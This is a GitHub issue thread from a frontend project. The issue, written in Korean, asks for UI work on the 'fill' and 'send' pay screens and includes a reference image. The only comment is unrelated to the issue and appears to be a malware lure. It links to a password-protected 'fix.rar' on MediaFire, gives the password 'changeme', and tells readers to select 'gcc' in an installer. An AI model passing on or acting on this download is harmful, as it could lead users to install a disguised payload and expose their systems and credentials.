### ISSUE TITLE
[FEAT] 채우기 보내기 UI

### ISSUE THREAD

**Issue by s0ojin** [dongibuyeo/core-frontend#51]
## 어떤 기능인가요?

> 채우기와 보내기페이 UI작업

## 작업 상세 내용

- [x] 채우기/보내기 UI

## 참고할만한 자료(선택)
![image](https://github.com/user-attachments/assets/a3feb6de-b7f0-4d34-a139-07d971865e65)

**Comment by Taiga-A** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
